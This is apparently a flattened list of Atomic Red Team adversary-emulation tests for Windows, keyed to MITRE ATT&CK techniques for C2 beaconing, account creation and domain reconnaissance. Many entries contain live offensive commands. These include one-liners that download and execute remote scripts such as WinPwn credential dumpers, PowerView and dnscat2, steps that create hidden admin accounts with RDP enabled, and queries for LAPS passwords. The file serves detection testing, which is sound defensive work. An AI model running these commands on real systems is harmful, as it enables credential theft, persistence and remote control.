Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
T1071.001 command_prompt windows Malicious User Agents - CMD
Web Protocols
This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed. Use an application such as Wireshark to record the session and observe user agent strings and responses. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
#{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
#{curl_path} -s -A "*<|>*" -m3 #{domain} >nul 2>&1
T1071.004 powershell windows DNS Large Query Volume
DNS
This test simulates an infected host sending a large volume of DNS queries to a command and control server. The intent of this test is to trigger threshold-based detection on the number of DNS queries either from a single source system or to a single target domain. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}-$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
T1071.004 powershell windows DNS Regular Beaconing
DNS
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time. This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection. A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
T1071.004 powershell windows DNS Long Domain Query
DNS
This test simulates an infected host returning data to a command and control server using long domain names. The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold. Upon execution, DNS information about the domain will be displayed for each callout.
Set-Location "PathToAtomicsFolder"
.\T1071.004\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
T1071.004 powershell windows DNS C2
DNS
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command. The following blogs have more information. https://github.com/iagox86/dnscat2 https://github.com/lukebaggett/dnscat2-powershell
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
T1072 command_prompt elevated windows Radmin Viewer Utility
Software Deployment Tools
An adversary may use the Radmin Viewer Utility to remotely control a Windows device; this will start the Radmin console.
"%PROGRAMFILES(x86)%/#{radmin_exe}"
T1072 command_prompt elevated windows PDQ Deploy RAT
Software Deployment Tools
An adversary may use PDQ Deploy software to deploy the Remote Administration Tool; this will start the PDQ console.
"%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}"
T1072 powershell windows Deploy 7-Zip Using Chocolatey
Software Deployment Tools
An adversary may use Chocolatey to remotely deploy the 7-Zip file archiver utility.
# Deploy 7-Zip using Chocolatey
choco install -y 7zip
T1074.001 powershell windows Stage data from Discovery.bat
Local Data Staging
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution, verify that the file is saved in the temp directory.
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file}
T1074.001 powershell windows Zip a Folder with PowerShell for Staging in Temp
Local Data Staging
Use living-off-the-land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory.
Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force
T1078.001 command_prompt elevated windows Enable Guest account with RDP capability and admin privileges
Default Accounts
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections.
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
T1078.001 command_prompt elevated windows Activate Guest Account
Default Accounts
Adversaries can activate the default Guest account, which is inactive by default.
net user #{guest_user} /active:yes
T1078.003 command_prompt elevated windows Create local account with admin privileges
Local Accounts
After execution the new account will be active and added to the Administrators group
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
T1078.003 powershell elevated windows WinPwn - Loot local Credentials - powerhell kittie
Local Accounts
Loot local Credentials - powerhell kittie technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
T1078.003 powershell elevated windows WinPwn - Loot local Credentials - Safetykatz
Local Accounts
Loot local Credentials - Safetykatz technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
T1078.003 command_prompt elevated windows Use PsExec to elevate to NT Authority\SYSTEM account
Local Accounts
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account. The local system account is a default Windows account which has unrestricted access to all system resources. Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami
T1082 command_prompt windows System Information Discovery
System Information Discovery
Identify System Info. Upon execution, system info and time info will be displayed.
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
T1082 command_prompt windows Hostname Discovery (Windows)
System Information Discovery
Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.
hostname
T1082 command_prompt windows Windows MachineGUID Discovery
System Information Discovery
Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
T1082 powershell windows Griffon Recon
System Information Discovery
This script emulates the reconnaissance script seen in use by Griffon and was modified by security researcher Kirk Sayre in order to simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5). For more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)
cscript "#{vbscript}"
T1082 command_prompt windows Environment variables discovery on windows
System Information Discovery
Identify all environment variables. Upon execution, environment variables and your path info will be displayed.
set
T1082 powershell windows WinPwn - winPEAS
System Information Discovery
Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
winPEAS -noninteractive -consoleoutput
T1082 powershell windows WinPwn - itm4nprivesc
System Information Discovery
Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
itm4nprivesc -noninteractive -consoleoutput
T1082 powershell windows WinPwn - Powersploits privesc checks
System Information Discovery
Powersploits privesc checks using oldchecks function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
oldchecks -noninteractive -consoleoutput
T1082 powershell windows WinPwn - General privesc checks
System Information Discovery
General privesc checks using the otherchecks function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
otherchecks -noninteractive -consoleoutput
T1082 powershell windows WinPwn - GeneralRecon
System Information Discovery
Collect general computer information via the GeneralRecon function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Generalrecon -consoleoutput -noninteractive
T1082 powershell windows WinPwn - Morerecon
System Information Discovery
Gathers local system information using the Morerecon function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Morerecon -noninteractive -consoleoutput
T1082 powershell windows WinPwn - RBCD-Check
System Information Discovery
Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
RBCD-Check -consoleoutput -noninteractive
T1082 powershell windows WinPwn - PowerSharpPack - Watson searching for missing windows patches
System Information Discovery
PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')
Invoke-watson
T1082 powershell windows WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors
System Information Discovery
PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')
Invoke-SharpUp -command "audit"
T1082 powershell windows WinPwn - PowerSharpPack - Seatbelt
System Information Discovery
PowerSharpPack - Seatbelt technique via function of WinPwn. [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
$S3cur3Th1sSh1t_repo = 'https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"
T1082 command_prompt windows System Information Discovery with WMIC
System Information Discovery
Identify system information with the WMI command-line (WMIC) utility. Upon execution, various system information will be displayed, including: OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ Elements of this test were observed in the wild used by Aurora Stealer in late 2022 and early 2023, as highlighted in public reporting: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/
wmic cpu get name
wmic MEMPHYSICAL get MaxCapacity
wmic baseboard get product
wmic baseboard get version
wmic bios get SMBIOSBIOSVersion
wmic path win32_VideoController get name
wmic path win32_VideoController get DriverVersion
wmic path win32_VideoController get VideoModeDescription
wmic OS get Caption,OSArchitecture,Version
wmic DISKDRIVE get Caption
Get-WmiObject win32_bios
T1082 command_prompt elevated windows System Information Discovery
System Information Discovery
The script gathernetworkinfo.vbs is employed to collect system information such as the operating system, DNS details, firewall configuration, etc. Outputs are stored in c:\Windows\System32\config or c:\Windows\System32\reg. https://www.verboon.info/2011/06/the-gathernetworkinfo-vbs-script/
wscript.exe C:\Windows\System32\gatherNetworkInfo.vbs
T1082 command_prompt windows Check computer location
System Information Discovery
Looks up the country code configured in the registry, likely for geofencing. Upon execution, country code info will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1
reg query "HKEY_CURRENT_USER\Control Panel\International\Geo"
T1082 command_prompt windows BIOS Information Discovery through Registry
System Information Discovery
Looks up BIOS information in the registry. BIOS information is often read in order to detect sandboxing environments. Upon execution, BIOS information will be displayed. - https://tria.ge/210111-eaz8mqhgh6/behavioral1 - https://evasions.checkpoint.com/techniques/registry.html
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v SystemBiosVersion
reg query HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System /v VideoBiosVersion
T1082 command_prompt windows ESXi - VM Discovery using ESXCLI
System Information Discovery
An adversary will use ESXCLI to enumerate the Virtual Machines on the host prior to executing a power-off routine. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 command_prompt windows ESXi - Darkside system information discovery
System Information Discovery
Darkside ransomware utilises various ESXCLI commands to obtain information about the ESXi Host. [Reference](https://www.trendmicro.com/en_ph/research/21/e/darkside-linux-vms-targeted.html)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1082 powershell windows operating system discovery
System Information Discovery
Operating system discovery using Get-CimInstance. https://petri.com/getting-operating-system-information-powershell/
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, ServicePackMajorVersion, OSArchitecture, CSName, WindowsDirectory | Out-null
T1082 command_prompt windows Check OS version via "ver" command
System Information Discovery
The ver command shows information about the OS version.
ver
T1082 command_prompt elevated windows Display volume shadow copies with "vssadmin"
System Information Discovery
The command shows all available volume shadow copies, along with their creation time and location.
vssadmin.exe list shadows
T1082 command_prompt windows Identify System Locale and Regional Settings with PowerShell
System Information Discovery
This action demonstrates how an attacker might gather a system's region and language settings using PowerShell, which could aid in profiling the machine's location and user language preferences. The command outputs system locale details to a temporary file for further analysis.
powershell.exe -c "Get-Culture | Format-List | Out-File -FilePath %TMP%\a.txt"
T1082 command_prompt windows Enumerate Available Drives via gdr
System Information Discovery
This test simulates an attacker attempting to list the available drives on the system to gather data about file storage locations.
powershell.exe -c "gdr -PSProvider 'FileSystem'"
T1082 command_prompt windows Discover OS Product Name via Registry
System Information Discovery
Identify the Operating System Product Name via registry with the reg.exe command. Upon execution, the OS Product Name will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
T1082 command_prompt windows Discover OS Build Number via Registry
System Information Discovery
Identify the Operating System Build Number via registry with the reg.exe command. Upon execution, the OS Build Number will be displayed.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuildNumber
T1083 command_prompt windows File and Directory Discovery (cmd.exe)
File and Directory Discovery
Find or discover files on the file system. Upon successful execution, this test will output the results of all the data discovery commands to a specified file.
dir /s c:\ >> #{output_file}
dir /s "c:\Documents and Settings" >> #{output_file}
dir /s "c:\Program Files\" >> #{output_file}
dir "%systemdrive%\Users\*.*" >> #{output_file}
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> #{output_file}
dir "%userprofile%\Desktop\*.*" >> #{output_file}
tree /F >> #{output_file}
T1083 powershell windows File and Directory Discovery (PowerShell)
File and Directory Discovery
Find or discover files on the file system. Upon execution, file and folder information will be displayed.
ls -recurse
get-childitem -recurse
gci -recurse
T1083 powershell windows Simulating MAZE Directory Enumeration
File and Directory Discovery
This test emulates MAZE ransomware's ability to enumerate directories using Powershell. Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
$UsersFolder = "$env:homedrive\Users\"
foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
{
  foreach ($secondarydirectory in $folderarray)
  { Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output} }
}
cat #{File_to_output}
T1083 powershell windows Launch DirLister Executable
File and Directory Discovery
Launches the DirLister executable for a short period of time and then exits. Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files.
Start-Process "#{dirlister_path}"
Start-Sleep -Second 4
Stop-Process -Name "DirLister"
T1083 command_prompt windows ESXi - Enumerate VMDKs available on an ESXi Host
File and Directory Discovery
An adversary uses the find command to enumerate vmdks on an ESXi host. [Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{cli_script}"
T1083 powershell windows Recursive Enumerate Files And Directories By Powershell
File and Directory Discovery
Adversary attempting to discover and collect sensitive documents and archives from a user’s system. The test recursively enumerates common user folders (Documents, Downloads, Desktop, OneDrive) for file types of interest such as .pdf, .doc, .docx, .xls, .xlsx, .txt, .zip, .rar, and .7z. This behavior is similar to malware like LOSTKEYS used by COLDRIVER in January 2025, where attackers perform targeted file discovery to support strategic intelligence collection https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix.
$out = "#{output_file}"
$dirsFilter = @('Documents','Downloads','Desktop','OneDrive')
$exts = @('.pdf','.doc','.docx','.xls','.xlsx','.txt','.zip','.rar','.7z')
$userProfile = [Environment]::GetFolderPath('UserProfile')
$tr = [System.Collections.Generic.List[string]]::new()

function MatchesExtension($path) {
  try {
    $e = [System.IO.Path]::GetExtension($path).ToLower()
    return $exts -contains $e
  } catch { return $false }
}

function Scan-Dir($root) {
  try {
    $match = $false
    foreach ($f in $dirsFilter) { if ($root -like "*$f*") { $match = $true; break } }
    if (-not $match) { return }

    [System.IO.Directory]::EnumerateFiles($root) | ForEach-Object {
      if (MatchesExtension $_) {
        $fi = [System.IO.FileInfo]::new($_)
        $tr.Add("[File] $_ Size:$($fi.Length) LastWrite:$($fi.LastWriteTime)")
      }
    }

    [System.IO.Directory]::EnumerateDirectories($root) | ForEach-Object {
      Scan-Dir $_
    }
  } catch [System.UnauthorizedAccessException] {
    $tr.Add("[AccessDenied] $root")
  } catch {
    $tr.Add("[Error] $root => $($_.Exception.Message)")
  }
}

[System.IO.Directory]::EnumerateDirectories($userProfile) | ForEach-Object { Scan-Dir $_ }

# Ensure output dir exists
$outDir = [System.IO.Path]::GetDirectoryName($out)
if (-not [string]::IsNullOrEmpty($outDir) -and -not (Test-Path $outDir)) {
  New-Item -Path $outDir -ItemType Directory -Force | Out-Null
}

# Write results
$tr | Out-File -FilePath $out -Encoding UTF8
Write-Output "Enumeration complete. Results written to: $out"
T1087.001 command_prompt windows Enumerate all accounts on Windows (Local)
Local Account
Enumerate all accounts. Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session.
net user
dir c:\Users\
cmdkey.exe /list
net localgroup "Users"
net localgroup
T1087.001 powershell windows Enumerate all accounts via PowerShell (Local)
Local Account
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
net user
get-localuser
get-localgroupmember -group Users
cmdkey.exe /list
ls C:/Users
get-childitem C:\Users\
dir C:\Users\
get-localgroup
net localgroup
T1087.001 command_prompt windows Enumerate logged on users via CMD (Local)
Local Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user
T1087.001 command_prompt windows ESXi - Local Account Discovery via ESXCLI
Local Account
An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "esxcli system account list"
T1087.002 command_prompt windows Enumerate all accounts (Domain)
Domain Account
Enumerate all accounts. Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session.
net user /domain
net group /domain
T1087.002 powershell windows Enumerate all accounts via PowerShell (Domain)
Domain Account
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 command_prompt windows Enumerate logged on users via CMD (Domain)
Domain Account
Enumerate logged on users. Upon execution, logged on users will be displayed.
query user /SERVER:#{computer_name}
T1087.002 powershell windows Automated AD Recon (ADRecon)
Domain Account
ADRecon extracts and combines information about an AD environment into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Invoke-Expression "#{adrecon_path}"
T1087.002 command_prompt windows Adfind -Listing password policy
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. The example chosen illustrates AdFind used to query the local password policy. Reference: http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Admins
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts. Reference: http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory User Objects
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 command_prompt windows Adfind - Enumerate Active Directory Exchange AD Objects
Domain Account
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects. Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 command_prompt windows Enumerate Default Domain Admin Details (Domain)
Domain Account
This test will enumerate the details of the built-in domain admin account.
net user administrator /domain
T1087.002 powershell windows Enumerate Active Directory for Unconstrained Delegation
Domain Account
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000; 524288) set. More information: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: the AD RSAT PowerShell module is needed and the test must run under a domain user.
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
T1087.002 powershell windows Get-DomainUser with PowerView
Domain Account
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
T1087.002 powershell windows Enumerate Active Directory Users with ADSISearcher
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution, a listing of users will be output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1087.002 powershell windows Enumerate Linked Policies In ADSISearcher Discovery
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate organizational units within Active Directory. Upon successful execution, a listing of users will be output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 powershell windows Enumerate Root Domain linked policies Discovery
Domain Account
The following Atomic test will utilize ADSISearcher to enumerate the root domain unit within Active Directory. Upon successful execution, a listing of users will be output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 powershell windows WinPwn - generaldomaininfo
Domain Account
Gathers general domain information using the generaldomaininfo function of WinPwn.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
T1087.002 powershell windows Kerbrute - userenum
Domain Account
Enumerates Active Directory usernames using the userenum function of Kerbrute.
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
T1087.002 powershell windows Wevtutil - Discover NTLM Users Remote
Domain Account
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures event code 4776 from the domain controller and stores the output in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer all properties
Domain Account
This test executes an LDAP query using the PowerShell cmdlet Get-ADComputer and lists all the properties, including the Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime.
Get-ADComputer #{hostname} -Properties *
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
Domain Account
This test executes an LDAP query using the PowerShell cmdlet Get-ADComputer and lists the Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime.
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 powershell windows Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
Domain Account
This test executes an LDAP query using the PowerShell cmdlet Get-ADComputer with SearchScope set to subtree and lists all the properties, including the Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime.
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
T1087.002 powershell windows Suspicious LAPS Attributes Query with adfind all properties
Domain Account
This test executes an LDAP query using the AdFind command and lists all the attributes, including the Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime.
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
T1087.002 powershell windows Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
Domain Account
This test executes an LDAP query using the AdFind command and lists the Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime.
